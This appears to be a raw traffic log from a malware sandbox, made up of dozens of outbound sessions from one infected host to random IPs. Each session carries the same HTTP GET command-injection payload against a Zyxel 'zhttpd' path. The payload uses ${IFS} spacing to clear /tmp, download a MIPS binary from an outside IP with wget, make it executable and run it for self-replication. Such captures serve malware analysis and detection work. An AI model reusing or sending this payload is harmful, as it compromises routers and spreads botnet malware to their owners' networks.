                                            Jan 14, 2024 15:50:30.264142036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1812192.168.2.2341086131.195.167.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264163017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1813192.168.2.235570096.231.133.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264182091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1814192.168.2.233757082.226.24.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264225006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1815192.168.2.234213238.234.47.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264225006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1816192.168.2.234813019.198.127.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264267921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1817192.168.2.234750434.4.25.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264285088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1818192.168.2.236031097.191.1.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264291048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1819192.168.2.2342738170.214.94.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264318943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1820192.168.2.2360914182.21.173.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264348984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1821192.168.2.2333594165.197.253.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264383078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1822192.168.2.2357694170.193.84.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264421940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1823192.168.2.2345720172.2.207.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264451027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1824192.168.2.2349372213.215.229.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264468908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1825192.168.2.233967644.207.99.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264501095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1826192.168.2.23540061.0.53.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264522076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1827192.168.2.2337710137.37.183.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264569998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1828192.168.2.2342474194.194.160.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264575958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1829192.168.2.2338526184.214.108.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264626026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1830192.168.2.2341588134.139.18.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264636993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1831192.168.2.2346852194.5.120.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264676094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1832192.168.2.2345122201.5.193.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264705896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1833192.168.2.2344884136.15.140.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264738083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1834192.168.2.2352960185.161.240.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264771938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1835192.168.2.235627683.243.31.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264794111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1836192.168.2.233836850.246.245.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264852047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1837192.168.2.233504652.39.206.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264880896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1838192.168.2.236046470.158.186.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264880896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1839192.168.2.2344688101.174.28.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264909029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1840192.168.2.234585850.114.220.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264940023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1841192.168.2.2346760129.190.133.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264959097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1842192.168.2.2345008148.129.1.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264972925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1843192.168.2.2336362174.215.241.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265003920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1844192.168.2.2344164174.95.49.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265019894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1845192.168.2.234730672.188.208.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265042067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1846192.168.2.2348574140.34.124.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265096903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1847192.168.2.2339118222.13.28.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265110016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1848192.168.2.233464273.128.16.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265182018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1849192.168.2.2351984169.176.36.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265213013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1850192.168.2.2359094208.15.138.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265232086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1851192.168.2.2349866178.244.214.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265265942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1852192.168.2.2338474108.88.200.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265306950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1853192.168.2.2352624157.247.49.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265326023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1854192.168.2.233546492.219.41.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265346050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1855192.168.2.233511869.166.45.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265400887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1856192.168.2.234864037.2.36.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265414000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1857192.168.2.23447641.47.111.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265444040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1858192.168.2.234680627.64.101.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265480995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1859192.168.2.235508670.225.8.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.265490055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1860192.168.2.233622683.149.233.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.268989086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1861192.168.2.2358332164.221.135.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269005060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1862192.168.2.233594064.212.31.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269023895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1863192.168.2.2335070133.111.72.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269095898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1864192.168.2.234513063.53.96.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269104958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1865192.168.2.2345310223.247.197.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269140959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1866192.168.2.235862261.79.8.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269165039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1867192.168.2.2347458166.7.159.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269201994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1868192.168.2.2349734137.68.107.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269234896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1869192.168.2.2337510138.63.165.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269262075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1870192.168.2.2349454149.168.192.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269306898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1871192.168.2.234555239.178.178.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269321918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1872192.168.2.2354512123.53.179.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269345999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1873192.168.2.2356242134.108.3.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269372940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1874192.168.2.235486097.77.77.36443
                                            TimestampBytes transferredDirectionData
